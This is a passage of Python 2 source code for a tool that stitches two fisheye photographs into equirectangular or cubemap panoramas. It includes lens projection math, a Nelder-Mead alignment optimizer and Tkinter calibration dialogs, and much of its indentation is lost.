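    qq = norm_qq(0, 0, np.sin(pi / 4))      # [cos(45), 0, 0, sin(45)]
    vec = np.matrix([[1.0], [0.0], [0.0]])  # unit vector along +X
    return get_rotation_matrix(qq) * vec    # approximately [[0], [1], [0]]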
# Return length of every column in an MxN matrix.
def matrix_len(x):
#return np.sqrt(np.sum(np.square(x), axis=0))
return np.linalg.norm(x, axis=0)
# Normalize an MxN matrix such that all N columns have unit length.
def matrix_norm(x):
return x / (matrix_len(x) + 1e-9)
# Parameters for a fisheye lens, including its orientation.
class FisheyeLens:
def __init__(self, rows=1024, cols=1024):
# Fisheye lens parameters.
self.fov_deg = 180
self.radius_px = min(rows,cols) / 2
# Pixel coordinates of the optical axis (X,Y).
self.center_px = np.matrix([[cols/2], [rows/2]])
        # Quaternion mapping the intended optical axis to the actual one.
self.center_qq = [1, 0, 0, 0]
def downsample(self, dsamp):
self.radius_px /= dsamp
self.center_px /= dsamp
def get_x(self):
return np.asscalar(self.center_px[0])
def get_y(self):
return np.asscalar(self.center_px[1])
def to_dict(self):
return {'cx':self.get_x(),
'cy':self.get_y(),
'cr':self.radius_px,
'cf':self.fov_deg,
'qw':self.center_qq[0],
'qx':self.center_qq[1],
'qy':self.center_qq[2],
'qz':self.center_qq[3]}
def from_dict(self, data):
self.center_px[0] = data['cx']
self.center_px[1] = data['cy']
self.radius_px = data['cr']
self.fov_deg = data['cf']
self.center_qq[0] = data['qw']
self.center_qq[1] = data['qx']
self.center_qq[2] = data['qy']
self.center_qq[3] = data['qz']
# Load or save lens configuration and alignment.
def load_config(file_obj, lens1, lens2):
[data1, data2] = json.load(file_obj)
lens1.from_dict(data1)
lens2.from_dict(data2)
def save_config(file_obj, lens1, lens2):
data = [lens1.to_dict(), lens2.to_dict()]
json.dump(data, file_obj, indent=2, sort_keys=True)
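# Illustrative lens.cfg contents as produced by save_config() (two lenses; the
# numeric values below are hypothetical):
#
# [
#   {"cf": 190.0, "cr": 512, "cx": 512.0, "cy": 512.0,
#    "qw": 1.0, "qx": 0.0, "qy": 0.0, "qz": 0.0},
#   {"cf": 190.0, "cr": 512, "cx": 510.0, "cy": 514.0,
#    "qw": 0.0, "qx": 0.0, "qy": 1.0, "qz": 0.0}
# ]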
# Fisheye source image, with lens and rotation parameters.
# Contains functions for extracting pixel data given direction vectors.
class FisheyeImage:
# Load image file and set default parameters
def __init__(self, src_file, lens=None):
# Load the image file, and convert to a numpy matrix.
self._update_img(Image.open(src_file))
# Set lens parameters.
if lens is None:
self.lens = FisheyeLens(self.rows, self.cols)
else:
self.lens = lens
# Update image matrix and corresponding size variables.
def _update_img(self, img):
self.img = np.array(img)
self.rows = self.img.shape[0]
self.cols = self.img.shape[1]
self.clrs = self.img.shape[2]
# Shrink source image and adjust lens accordingly.
def downsample(self, dsamp):
# Adjust lens parameters.
self.lens.downsample(dsamp)
# Determine the new image dimensions.
# Note: PIL uses cols, rows whereas numpy uses rows, cols
shape = (self.img.shape[1] / dsamp, # Cols
self.img.shape[0] / dsamp) # Rows
# Convert matrix back to PIL Image and resample.
img = Image.fromarray(self.img)
img.thumbnail(shape, Image.BICUBIC)
# Convert back and update size.
self._update_img(img)
# Given an 3xN array of "XYZ" vectors in panorama space (+X = Front),
# convert each ray to 2xN coordinates in "UV" fisheye image space.
def get_uv(self, xyz_vec):
# Extract lens parameters of interest.
fov_rad = self.lens.fov_deg * pi / 180
fov_scale = np.float32(2 * self.lens.radius_px / fov_rad)
# Normalize the input vector and rotate to match lens reference axes.
xyz_rot = get_rotation_matrix(self.lens.center_qq) * matrix_norm(xyz_vec)
# Convert to polar coordinates relative to lens boresight.
# (In lens coordinates, unit vector's X axis gives boresight angle;
# normalize Y/Z to get a planar unit vector for the bearing.)
# Note: Image +Y maps to 3D +Y, and image +X maps to 3D +Z.
theta_rad = np.arccos(xyz_rot[0,:])
proj_vec = matrix_norm(np.concatenate((xyz_rot[2,:], xyz_rot[1,:])))
# Fisheye lens maps 3D angle to focal-plane radius.
# TODO: Do we need a better model for lens distortion?
rad_px = theta_rad * fov_scale
# Convert back to focal-plane rectangular coordinates.
uv = np.multiply(rad_px, proj_vec) + self.lens.center_px
return np.asarray(uv + 0.5, dtype=int)
# Given an 2xN array of UV pixel coordinates, check if each pixel is
# within the fisheye field of view. Returns N-element boolean mask.
def get_mask(self, uv_px):
# Check whether each coordinate is within outer image bounds,
# and within the illuminated area under the fisheye lens.
x_mask = np.logical_and(0 <= uv_px[0], uv_px[0] < self.cols)
y_mask = np.logical_and(0 <= uv_px[1], uv_px[1] < self.rows)
# Check whether each coordinate is within the illuminated area.
r_mask = matrix_len(uv_px - self.lens.center_px) < self.lens.radius_px
# All three checks must pass to be considered visible.
all_mask = np.logical_and(r_mask, np.logical_and(x_mask, y_mask))
return np.squeeze(np.asarray(all_mask))
    # Given a 2xN array of UV pixel coordinates, return a weight score
# that is proportional to the distance from the edge.
def get_weight(self, uv_px):
mm = self.get_mask(uv_px)
rr = self.lens.radius_px - matrix_len(uv_px - self.lens.center_px)
rr[~mm] = 0
return rr
# Given a 2xN array of UV pixel coordinates, return the value of each
# corresponding pixel. Output format is Nx1 (grayscale) or Nx3 (color).
# Pixels outside the fisheye's field of view are pure black (0) or (0,0,0).
def get_pixels(self, uv_px):
# Create output array with default pixel values.
pcount = uv_px.shape[1]
result = np.zeros((pcount, self.clrs), dtype=self.img.dtype)
# Overwrite in-bounds pixels as specified above.
self.add_pixels(uv_px, result)
return result
# Given a 2xN array of UV pixel coordinates, write the value of each
# corresponding pixel to the linearized input/output image (Nx3).
# Several weighting modes are available.
def add_pixels(self, uv_px, img1d, weight=None):
# Lookup row & column for each in-bounds coordinate.
mask = self.get_mask(uv_px)
xx = uv_px[0,mask]
yy = uv_px[1,mask]
# Update matrix according to assigned weight.
if weight is None:
img1d[mask] = self.img[yy,xx]
elif np.isscalar(weight):
img1d[mask] += self.img[yy,xx] * weight
else:
w1 = np.asmatrix(weight, dtype='float32')
w3 = w1.transpose() * np.ones((1,3))
img1d[mask] += np.multiply(self.img[yy,xx], w3[mask])
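    # Usage sketch (illustrative; the variable names uv, buf and xyz are
    # hypothetical): given uv = img.get_uv(xyz) and a float32 buffer buf of
    # shape (N, clrs),
    #     img.add_pixels(uv, buf)                      # overwrite in-bounds pixels
    #     img.add_pixels(uv, buf, 0.5)                 # accumulate at 50% intensity
    #     img.add_pixels(uv, buf, img.get_weight(uv))  # per-pixel edge weights
    # mirroring the three weighting branches above.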
# A panorama image made from several FisheyeImage sources.
# TODO: Add support for supersampled anti-aliasing filters.
class PanoramaImage:
def __init__(self, src_list):
self.debug = True
self.sources = src_list
self.dtype = self.sources[0].img.dtype
self.clrs = self.sources[0].clrs
# Downsample each source image.
def downsample(self, dsamp):
for src in self.sources:
src.downsample(dsamp)
# Return a list of 'mode' strings suitable for render_xx() methods.
def get_render_modes(self):
return ['overwrite', 'align', 'blend']
# Retrieve a scaled copy of lens parameters for the Nth source.
def scale_lens(self, idx, scale=None):
temp = deepcopy(self.sources[idx].lens)
temp.downsample(1.0 / scale)
return temp
# Using current settings as an initial guess, use an iterative optimizer
# to better align the source images. Adjusts FOV of each lens, as well
# as the rotation quaternions for all lenses except the first.
# TODO: Implement a higher-order loop that iterates this step with
# progressively higher resolution. (See also: create_panorama)
# TODO: Find a better scoring heuristic. Present solution always
# converges on either FOV=0 or FOV=9999, depending on wt_pixel.
def optimize(self, psize=256, wt_pixel=1000, wt_blank=1000):
# Precalculate raster-order XYZ coordinates at given resolution.
[xyz, rows, cols] = self._get_equirectangular_raster(psize)
# Scoring function gives bonus points per overlapping pixel.
score = lambda svec: self._score(svec, xyz, wt_pixel, wt_blank)
# Multivariable optimization using gradient-descent or similar.
# https://docs.scipy.org/doc/scipy/reference/tutorial/optimize.html
svec0 = self._get_state_vector()
final = minimize(score, svec0, method='Nelder-Mead',
options={'xtol':1e-4, 'disp':True})
# Store final lens parameters.
self._set_state_vector(final.x)
# Render combined panorama in equirectangular projection mode.
# See also: https://en.wikipedia.org/wiki/Equirectangular_projection
def render_equirectangular(self, out_size, mode='blend'):
# Render the entire output in a single pass.
[xyz, rows, cols] = self._get_equirectangular_raster(out_size)
return Image.fromarray(self._render(xyz, rows, cols, mode))
# Render combined panorama in cubemap projection mode.
# See also: https://en.wikipedia.org/wiki/Cube_mapping
def render_cubemap(self, out_size, mode='blend'):
# Create coordinate arrays.
cvec = np.arange(out_size, dtype='float32') - out_size/2 # Coordinate range [-S/2, S/2)
vec0 = np.ones(out_size*out_size, dtype='float32') * out_size/2 # Constant vector +S/2
vec1 = np.repeat(cvec, out_size) # Increment every N steps
vec2 = np.tile(cvec, out_size) # Sweep N times
# Create XYZ coordinate vectors and render each cubemap face.
render = lambda(xyz): self._render(xyz, out_size, out_size, mode)
xm = render(np.matrix([-vec0, vec1, vec2])) # -X face
xp = render(np.matrix([vec0, vec1, -vec2])) # +X face
ym = render(np.matrix([-vec1, -vec0, vec2])) # -Y face
yp = render(np.matrix([vec1, vec0, vec2])) # +Y face
zm = render(np.matrix([-vec2, vec1, -vec0])) # -Z face
zp = render(np.matrix([vec2, vec1, vec0])) # +Z face
# Concatenate the individual faces in canonical order:
# https://en.wikipedia.org/wiki/Cube_mapping#Memory_Addressing
img_mat = np.concatenate([zp, zm, ym, yp, xm, xp], axis=0)
return Image.fromarray(img_mat)
# Get XYZ vectors for an equirectangular render, in raster order.
    # (Each row left to right, with rows concatenated from top to bottom.)
def _get_equirectangular_raster(self, out_size):
# Set image size (2x1 aspect ratio)
rows = out_size
cols = 2*out_size
# Calculate longitude of each column.
theta_x = np.linspace(-pi, pi, cols, endpoint=False, dtype='float32')
cos_x = np.cos(theta_x).reshape(1,cols)
sin_x = np.sin(theta_x).reshape(1,cols)
        # Calculate latitude of each row.
ystep = pi / rows
theta_y = np.linspace(-pi/2 + ystep/2, pi/2 - ystep/2, rows, dtype='float32')
cos_y = np.cos(theta_y).reshape(rows,1)
sin_y = np.sin(theta_y).reshape(rows,1)
# Calculate X, Y, and Z coordinates for each output pixel.
x = cos_y * cos_x
y = sin_y * np.ones((1,cols), dtype='float32')
z = cos_y * sin_x
# Vectorize the coordinates in raster order.
xyz = np.matrix([x.ravel(), y.ravel(), z.ravel()])
return [xyz, rows, cols]
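    # Worked example (illustrative): for out_size=2 the raster is 2 rows by
    # 4 columns, with longitudes theta_x = [-pi, -pi/2, 0, pi/2] and latitudes
    # theta_y = [-pi/4, +pi/4]. A direction at theta_x = 0, theta_y = 0 maps to
    # (x, y, z) = (cos(y)*cos(x), sin(y), cos(y)*sin(x)) = (1, 0, 0), i.e.
    # +X = front, matching the convention used by FisheyeImage.get_uv().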
# Convert all lens parameters to a state vector. See also: optimize()
def _get_state_vector(self):
nsrc = len(self.sources)
assert nsrc > 0
svec = np.zeros(4*nsrc - 3)
# First lens: Only the FOV is stored.
svec[0] = self.sources[0].lens.fov_deg - 180
# All other lenses: Store FOV and quaternion parameters.
for n in range(1, nsrc):
svec[4*n-3] = self.sources[n].lens.fov_deg - 180
svec[4*n-2] = self.sources[n].lens.center_qq[1]
svec[4*n-1] = self.sources[n].lens.center_qq[2]
svec[4*n-0] = self.sources[n].lens.center_qq[3]
return svec
# Update lens parameters based on state vector. See also: optimize()
def _set_state_vector(self, svec):
# Sanity check on input vector.
nsrc = len(self.sources)
assert len(svec) == (4*nsrc - 3)
# First lens: Only the FOV is changed.
self.sources[0].lens.fov_deg = svec[0] + 180
# All other lenses: Update FOV and quaternion parameters.
for n in range(1, nsrc):
self.sources[n].lens.fov_deg = svec[4*n-3] + 180
self.sources[n].lens.center_qq[1] = svec[4*n-2]
self.sources[n].lens.center_qq[2] = svec[4*n-1]
self.sources[n].lens.center_qq[3] = svec[4*n-0]
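    # Layout sketch (illustrative): with two sources the state vector holds
    # 4*2 - 3 = 5 entries, packed as
    #     svec = [fov0 - 180,                   # lens 0: FOV only
    #             fov1 - 180, qx1, qy1, qz1]    # lens 1: FOV plus quaternion x/y/z
    # The scalar quaternion component (qw) of each lens is not optimized.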
# Add pixels from every source to form a complete output image.
# Several blending modes are available. See also: get_render_modes()
def _render(self, xyz, rows, cols, mode):
# Allocate Nx3 or Nx1 "1D" pixel-list (raster-order).
img1d = np.zeros((rows*cols, self.clrs), dtype='float32')
# Determine rendering mode:
if mode == 'overwrite':
# Simplest mode: Draw first, then blindly overwrite second.
for src in self.sources:
uv = src.get_uv(xyz)
src.add_pixels(uv, img1d)
elif mode == 'align':
# Alignment mode: Draw each one at 50% intensity.
for src in self.sources:
uv = src.get_uv(xyz)
src.add_pixels(uv, img1d, 0.5)
elif mode == 'blend':
# Linear nearest-source blending.
uv_list = []
wt_list = []
wt_total = np.zeros(rows*cols, dtype='float32')
# Calculate per-image and total weight matrices.
for src in self.sources:
uv = src.get_uv(xyz)
wt = src.get_weight(uv)
uv_list.append(uv)
wt_list.append(wt)
wt_total += wt
# Render overall image using calculated weights.
for n in range(len(self.sources)):
wt_norm = wt_list[n] / wt_total
self.sources[n].add_pixels(uv_list[n], img1d, wt_norm)
else:
raise ValueError('Invalid render mode.')
# Convert to fixed-point image matrix and return.
img2d = np.reshape(img1d, (rows, cols, self.clrs))
return np.asarray(img2d, dtype=self.dtype)
# Compute a normalized alignment score, based on size of overlap and
# the pixel-differences in that region. Note: Lower = Better.
def _score(self, svec, xyz, wt_pixel, wt_blank):
# Update lens parameters from state vector.
self._set_state_vector(svec)
# Determine masks for each input image.
uv0 = self.sources[0].get_uv(xyz)
uv1 = self.sources[1].get_uv(xyz)
wt0 = self.sources[0].get_weight(uv0) > 0
wt1 = self.sources[1].get_weight(uv1) > 0
# Count overlapping pixels.
ovr_mask = np.logical_and(wt0, wt1) # Overlapping pixel
pix_count = np.sum(wt0) + np.sum(wt1) # Total drawn pixels
blk_count = np.sum(np.logical_and(~wt0, ~wt1)) # Number of blank pixels
# Allocate Nx3 or Nx1 "1D" pixel-list (raster-order).
pcount = max(xyz.shape)
img1d = np.zeros((pcount, self.clrs), dtype='float32')
# Render the difference image, overlapping region only.
self.sources[0].add_pixels(uv0, img1d, 1.0*ovr_mask)
self.sources[1].add_pixels(uv1, img1d, -1.0*ovr_mask)
        # Sum of squared differences over the rendered difference image.
        sum_sqd = np.sum(np.square(img1d))
        # Compute overall score. (Note: Lower = Better; this is the value minimized by optimize().)
score = sum_sqd + wt_blank * blk_count - wt_pixel * pix_count
# (Debug) Print status information.
if (self.debug):
print str(svec) + ' --> ' + str(score)
return score
# Tkinter GUI window for loading a fisheye image.
class FisheyeAlignmentGUI:
def __init__(self, parent, src_file, lens):
# Set flag once all window objects created.
self.init_done = False
# Final result is the lens object.
self.lens = lens
# Load the input file.
self.img = Image.open(src_file)
# Create frame for this window with two vertical panels...
parent.wm_title('Fisheye Alignment')
self.frame = tk.Frame(parent)
self.controls = tk.Frame(self.frame)
        # Make sliders for adjusting the lens parameters (center, radius, FOV).
self.x = self._make_slider(self.controls, 0, 'Center-X (px)',
lens.get_x(), self.img.size[0])
self.y = self._make_slider(self.controls, 1, 'Center-Y (px)',
lens.get_y(), self.img.size[1])
self.r = self._make_slider(self.controls, 2, 'Radius (px)',
lens.radius_px, self.img.size[0])
self.f = self._make_slider(self.controls, 3, 'Field of view (deg)',
lens.fov_deg, 240, res=0.1)
# Create a frame for the preview image, which resizes based on the
# outer frame but does not respond to the contained preview size.
self.preview_frm = tk.Frame(self.frame)
self.preview_frm.bind('<Configure>', self._update_callback) # Update on resize
# Create the canvas object for the preview image.
self.preview = tk.Canvas(self.preview_frm)
# Finish frame creation.
self.controls.pack(side=tk.LEFT)
self.preview.pack(fill=tk.BOTH, expand=1)
self.preview_frm.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.frame.pack(fill=tk.BOTH, expand=1)
# Render the image once at default size
self.init_done = True
self.update_preview((800,800))
# Disable further size propagation.
self.preview_frm.update()
self.preview_frm.pack_propagate(0)
# Redraw the preview image using latest GUI parameters.
def update_preview(self, psize):
# Safety check: Ignore calls during construction/destruction.
if not self.init_done: return
# Copy latest user settings to the lens object.
self.lens.fov_deg = self.f.get()
self.lens.radius_px = self.r.get()
self.lens.center_px[0] = self.x.get()
self.lens.center_px[1] = self.y.get()
# Re-scale the image to match the canvas size.
# Note: Make a copy first, because thumbnail() operates in-place.
self.img_sc = self.img.copy()
self.img_sc.thumbnail(psize, Image.NEAREST)
self.img_tk = ImageTk.PhotoImage(self.img_sc)
# Re-scale the x/y/r parameters to match the preview scale.
pre_scale = float(psize[0]) / float(self.img.size[0])
x = self.x.get() * pre_scale
y = self.y.get() * pre_scale
r = self.r.get() * pre_scale
# Clear and redraw the canvas.
self.preview.delete('all')
self.preview.create_image(0, 0, anchor=tk.NW, image=self.img_tk)
self.preview.create_oval(x-r, y-r, x+r, y+r,
outline='#C00000', width=3)
# Make a combined label/textbox/slider for a given variable:
def _make_slider(self, parent, rowidx, label, inival, maxval, res=0.5):
# Create shared variable and set initial value.
tkvar = tk.DoubleVar()
tkvar.set(inival)
# Set a callback for whenever tkvar is changed.
# (The 'command' callback on the SpinBox only applies to the buttons.)
tkvar.trace('w', self._update_callback)
# Create the Label, SpinBox, and Scale objects.
label = tk.Label(parent, text=label)
spbox = tk.Spinbox(parent,
textvariable=tkvar,
from_=0, to=maxval, increment=res)
slide = tk.Scale(parent,
orient=tk.HORIZONTAL,
showvalue=0,
variable=tkvar,
from_=0, to=maxval, resolution=res)
label.grid(row=rowidx, column=0)
spbox.grid(row=rowidx, column=1)
slide.grid(row=rowidx, column=2)
return tkvar
# Find the largest output size that fits within the given bounds and
# matches the aspect ratio of the original source image.
def _get_aspect_size(self, max_size):
img_ratio = float(self.img.size[1]) / float(self.img.size[0])
return (min(max_size[0], max_size[1] / img_ratio),
min(max_size[1], max_size[0] * img_ratio))
# Thin wrapper for update_preview(), used to strip Tkinter arguments.
def _update_callback(self, *args):
# Sanity check that initialization is completed:
if not self.init_done: return
        # Determine the render size, preserving the source image's aspect ratio.
psize = self._get_aspect_size((self.preview_frm.winfo_width(),
self.preview_frm.winfo_height()))
# Render the preview at the given size.
if psize[0] >= 10 and psize[1] >= 10:
self.update_preview(psize)
# Tkinter GUI window for calibrating fisheye alignment.
class PanoramaAlignmentGUI:
def __init__(self, parent, panorama, psize=512):
self.init_done = False
# Store source and preview size
self.panorama = panorama
# Create frame for this window with two vertical panels...
parent.wm_title('Panorama Alignment')
self.frame = tk.Frame(parent)
self.controls = tk.Frame(self.frame)
# Make a drop-menu to select the rendering mode.
tk.Label(self.controls, text='Preview mode').grid(row=0, column=0, sticky=tk.W)
self.mode = tk.StringVar()
self.mode.set('align')
self.mode.trace('w', self._update_callback)
mode_list = self.panorama.get_render_modes()
mode_drop = tk.OptionMenu(self.controls, self.mode, *mode_list)
mode_drop.grid(row=0, column=1, columnspan=2, sticky='NESW')
# Determine which axis marks the main 180 degree rotation.
front_qq = panorama.sources[0].lens.center_qq
back_qq = panorama.sources[1].lens.center_qq
diff_qq = mul_qq(front_qq, back_qq)
# Create the axis selection toggle. (Flip on Y or Z)
self.flip_axis = tk.BooleanVar()
self.flip_axis.trace('w', self._update_callback)
if abs(diff_qq[2]) > abs(diff_qq[3]):
self.flip_axis.set(False)
flip_qq = [0,0,1,0]
else:
self.flip_axis.set(True)
flip_qq = [0,0,0,1]
tk.Label(self.controls, text='Flip axis').grid(row=1, column=0, sticky=tk.W)
axis_chk = tk.Checkbutton(self.controls, variable=self.flip_axis)
axis_chk.grid(row=1, column=1, columnspan=2, sticky='NESW')
# Extract the (hopefully small) alignment offset.
flip_conj = conj_qq(mul_qq(flip_qq, front_qq))
align_qq = mul_qq(back_qq, flip_conj)
# Make three sliders for adjusting the relative alignment.
self.slide_rx = self._make_slider(self.controls, 2, 'Rotate X', front_qq[1])
self.slide_ry = self._make_slider(self.controls, 3, 'Rotate Y', front_qq[2])
self.slide_rz = self._make_slider(self.controls, 4, 'Rotate Z', front_qq[3])
self.slide_ax = self._make_slider(self.controls, 5, 'Align X', align_qq[1])
self.slide_ay = self._make_slider(self.controls, 6, 'Align Y', align_qq[2])
self.slide_az = self._make_slider(self.controls, 7, 'Align Z', align_qq[3])
# Finish control-frame creation.
self.controls.pack(side=tk.LEFT)
# Create a frame for the preview image, which resizes based on the
# outer frame but does not respond to the contained preview size.
self.preview_frm = tk.Frame(self.frame)
self.preview_frm.bind('<Configure>', self._update_callback) # Update on resize
# Add the preview.
self.preview_lbl = tk.Label(self.preview_frm) # Label displays image
self.preview_lbl.pack()
self.preview_frm.pack(fill=tk.BOTH, expand=1)
# Finish frame creation.
self.frame.pack(fill=tk.BOTH, expand=1)
# Render the image once at default size
self.init_done = True
self.update_preview(psize)
# Disable further size propagation.
self.preview_frm.update()
self.preview_frm.pack_propagate(0)
# Update the GUI preview using latest alignment parameters.
def update_preview(self, psize):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the primary axis of rotation.
if self.flip_axis.get():
flip_qq = [0,0,0,1]
else:
flip_qq = [0,0,1,0]
# Calculate the orientation of both lenses.
front_qq = norm_qq(self.slide_rx.get(),
self.slide_ry.get(),
self.slide_rz.get())
align_qq = norm_qq(self.slide_ax.get(),
self.slide_ay.get(),
self.slide_az.get())
back_qq = mul_qq(align_qq, mul_qq(flip_qq, front_qq))
self.panorama.sources[0].lens.center_qq = front_qq
self.panorama.sources[1].lens.center_qq = back_qq
# Render the preview.
# Note: The Tk-Label doesn't maintain a reference to the image object.
# To avoid garbage-collection, keep one in this class.
self.preview_img = ImageTk.PhotoImage(
self.panorama.render_equirectangular(psize, self.mode.get()))
# Assign the new icon.
self.preview_lbl.configure(image=self.preview_img)
# Find the largest output size that fits within the given bounds and
# matches the 2:1 aspect ratio of the equirectangular preview.
def _get_aspect_size(self, max_size):
return (min(max_size[0], max_size[1] / 2),
min(max_size[1], max_size[0] * 2))
# Make a combined label/textbox/slider for a given variable:
def _make_slider(self, parent, rowidx, label, inival):
# Set limits and resolution.
lim = 1.0
res = 0.001
# Create shared variable.
tkvar = tk.DoubleVar()
tkvar.set(inival)
# Set a callback for whenever tkvar is changed.
# (The 'command' callback on the SpinBox only applies to the buttons.)
tkvar.trace('w', self._update_callback)
# Create the Label, SpinBox, and Scale objects.
label = tk.Label(parent, text=label)
spbox = tk.Spinbox(parent,
textvariable=tkvar,
from_=-lim, to=lim, increment=res)
slide = tk.Scale(parent,
orient=tk.HORIZONTAL,
showvalue=0,
variable=tkvar,
from_=-lim, to=lim, resolution=res)
label.grid(row=rowidx, column=0, sticky='W')
spbox.grid(row=rowidx, column=1)
slide.grid(row=rowidx, column=2)
return tkvar
# Thin wrapper for update_preview(), used to strip Tkinter arguments.
def _update_callback(self, *args):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the render size. (Always 2:1 aspect ratio.)
psize = min(self.preview_frm.winfo_width()/2,
self.preview_frm.winfo_height())
# Render the preview at the given size.
# TODO: Fudge factor of -2 avoids infinite resize loop.
# Is there a better way?
if psize >= 10:
self.update_preview(psize-2)
# Tkinter GUI window for end-to-end alignment and rendering.
class PanoramaGUI:
def __init__(self, parent):
# Store reference object for creating child dialogs.
self.parent = parent
self.win_lens1 = None
self.win_lens2 = None
self.win_align = None
self.work_done = False
self.work_error = None
self.work_status = None
# Create dummy lens configuration.
self.lens1 = FisheyeLens()
self.lens2 = FisheyeLens()
self.lens2.center_qq = [0,0,1,0] # Default flip along Y axis.
# Create frame for this GUI.
parent.wm_title('Panorama Creation Tool')
frame = tk.Frame(parent)
# Make file-selection inputs for the two images.
img_frame = tk.LabelFrame(frame, text='Input Images')
self.img1 = self._make_file_select(img_frame, 0, 'Image #1')
self.img2 = self._make_file_select(img_frame, 1, 'Image #2')
img_frame.pack()
# Make buttons to load, save, and adjust the lens configuration.
lens_frame = tk.LabelFrame(frame, text='Lens Configuration and Alignment')
btn_lens1 = tk.Button(lens_frame, text='Lens 1', command=self._adjust_lens1)
btn_lens2 = tk.Button(lens_frame, text='Lens 2', command=self._adjust_lens2)
btn_align = tk.Button(lens_frame, text='Align', command=self._adjust_align)
btn_auto = tk.Button(lens_frame, text='Auto', command=self._auto_align_start)
btn_load = tk.Button(lens_frame, text='Load', command=self.load_config)
btn_save = tk.Button(lens_frame, text='Save', command=self.save_config)
btn_lens1.grid(row=0, column=0, sticky='NESW')
btn_lens2.grid(row=0, column=1, sticky='NESW')
btn_align.grid(row=0, column=2, sticky='NESW')
btn_auto.grid(row=0, column=3, sticky='NESW')
btn_load.grid(row=1, column=0, columnspan=2, sticky='NESW')
btn_save.grid(row=1, column=2, columnspan=2, sticky='NESW')
lens_frame.pack(fill=tk.BOTH)
# Buttons to render the final output in different modes.
out_frame = tk.LabelFrame(frame, text='Final output rendering')
btn_rect = tk.Button(out_frame, text='Equirectangular',
command=self._render_rect)
btn_cube = tk.Button(out_frame, text='Cubemap',
command=self._render_cube)
btn_rect.pack(fill=tk.BOTH)
btn_cube.pack(fill=tk.BOTH)
out_frame.pack(fill=tk.BOTH)
# Status indicator box.
self.status = tk.Label(frame, relief=tk.SUNKEN,
text='Select input images to begin.')
self.status.pack(fill=tk.BOTH)
# Finish frame creation.
frame.pack()
# Helper function to destroy an object.
def _destroy(self, obj):
if obj is not None:
obj.destroy()
# Popup dialogs for each alignment step.
def _adjust_lens1(self):
self._destroy(self.win_lens1)
try:
self.win_lens1 = tk.Toplevel(self.parent)
FisheyeAlignmentGUI(self.win_lens1, self.img1.get(), self.lens1)
except IOError:
self._destroy(self.win_lens1)
tkMessageBox.showerror('Error', 'Unable to read image file #1.')
except:
self._destroy(self.win_lens1)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
def _adjust_lens2(self):
self._destroy(self.win_lens2)
try:
self.win_lens2 = tk.Toplevel(self.parent)
FisheyeAlignmentGUI(self.win_lens2, self.img2.get(), self.lens2)
except IOError:
self._destroy(self.win_lens2)
tkMessageBox.showerror('Error', 'Unable to read image file #2.')
except:
self._destroy(self.win_lens2)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
def _adjust_align(self):
self._destroy(self.win_align)
try:
pan = self._create_panorama()
self.win_align = tk.Toplevel(self.parent)
PanoramaAlignmentGUI(self.win_align, pan)
except:
self._destroy(self.win_align)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
# Automatic alignment.
# Use worker thread, because this may take a while.
def _auto_align_start(self):
try:
# Create panorama object from within GUI thread, since it depends
# on Tk variables which are NOT thread-safe.
pan = self._create_panorama()
# Display status message and display hourglass...
self._set_status('Starting auto-alignment...', 'wait')
# Create a new worker thread.
work = Thread(target=self._auto_align_work, args=[pan])
work.start()
# Set a timer to periodically check for completion.
self.parent.after(200, self._auto_align_timer)
except:
tkMessageBox.showerror('Auto-alignment error', traceback.format_exc())
def _auto_align_work(self, pan):
try:
# Repeat alignment at progressively higher resolution.
self._auto_align_step(pan, 16, 128, 'Stage 1/4')
self._auto_align_step(pan, 8, 128, 'Stage 2/4')
self._auto_align_step(pan, 4, 192, 'Stage 3/4')
self._auto_align_step(pan, 2, 256, 'Stage 4/4')
# Signal success!
self.work_status = 'Auto-alignment completed.'
self.work_error = None
self.work_done = True
except:
# Signal error.
self.work_status = 'Auto-alignment failed.'
self.work_error = traceback.format_exc()
self.work_done = True
def _auto_align_step(self, pan, scale, psize, label):
# Update status message.
self.work_status = 'Auto-alignment: ' + str(label)
# Create a panorama object at 1/scale times original resolution.
pan_sc = deepcopy(pan)
pan_sc.downsample(scale)
# Run optimization, rendering each hypothesis at the given resolution.
pan_sc.optimize(psize)
# Update local lens parameters.
# Note: These are not Tk variables, so are safe to change.
self.lens1 = pan_sc.scale_lens(0, scale)
self.lens2 = pan_sc.scale_lens(1, scale)
# Timer callback object checks outputs from worker thread.
# (Tkinter objects are NOT thread safe.)
def _auto_align_timer(self, *args):
# Check thread status.
if self.work_done:
# Update status message, with popup on error.
if self.work_status is not None:
self._set_status(self.work_status)
if self.work_error is not None:
self._set_status('Auto-alignment failed.')
tkMessageBox.showerror('Auto-alignment error', self.work_error)
# Clear the 'done' flag for future runs.
self.work_done = False
else:
# Update status message and keep hourglass.
if self.work_status is not None:
self._set_status(self.work_status, 'wait')
# Reset timer to be called again.
self.parent.after(200, self._auto_align_timer)
# Create panorama object using current settings.
def _create_panorama(self):
img1 = FisheyeImage(self.img1.get(), self.lens1)
img2 = FisheyeImage(self.img2.get(), self.lens2)
return PanoramaImage((img1, img2))
# Load or save lens configuration and alignment.
def load_config(self, filename=None):
if filename is None:
file_obj = tkFileDialog.askopenfile()
if file_obj is None: return
else:
file_obj = open(filename, 'r')
try:
load_config(file_obj, self.lens1, self.lens2)
except:
tkMessageBox.showerror('Config load error', traceback.format_exc())
def save_config(self, filename=None):
if filename is None:
file_obj = tkFileDialog.asksaveasfile()
if file_obj is None: return
else:
file_obj = open(filename, 'w')
try:
save_config(file_obj, self.lens1, self.lens2)
except:
tkMessageBox.showerror('Config save error', traceback.format_exc())
# Render and save output in various modes.
def _render_generic(self, render_type, render_size=1024):
# Popup asks user for output file.
file_obj = tkFileDialog.asksaveasfile(mode='wb')
# Abort if user clicks 'cancel'.
if file_obj is None: return
# Proceed with rendering...
self._set_status('Rendering image: ' + file_obj.name, 'wait')
try:
panorama = self._create_panorama()
render_func = getattr(panorama, render_type)
render_func(render_size).save(file_obj)
self._set_status('Done!')
except:
tkMessageBox.showerror('Render error', traceback.format_exc())
self._set_status('Render failed.')
def _render_rect(self):
self._render_generic('render_equirectangular')
def _render_cube(self):
self._render_generic('render_cubemap')
# Callback to create a file-selection popup.
def _file_select(self, tkstr):
result = tkFileDialog.askopenfile()
if result is not None:
tkstr.set(result.name)
result.close()
# Make a combined label/textbox/slider for a given variable:
def _make_file_select(self, parent, rowidx, label):
# Create string variable.
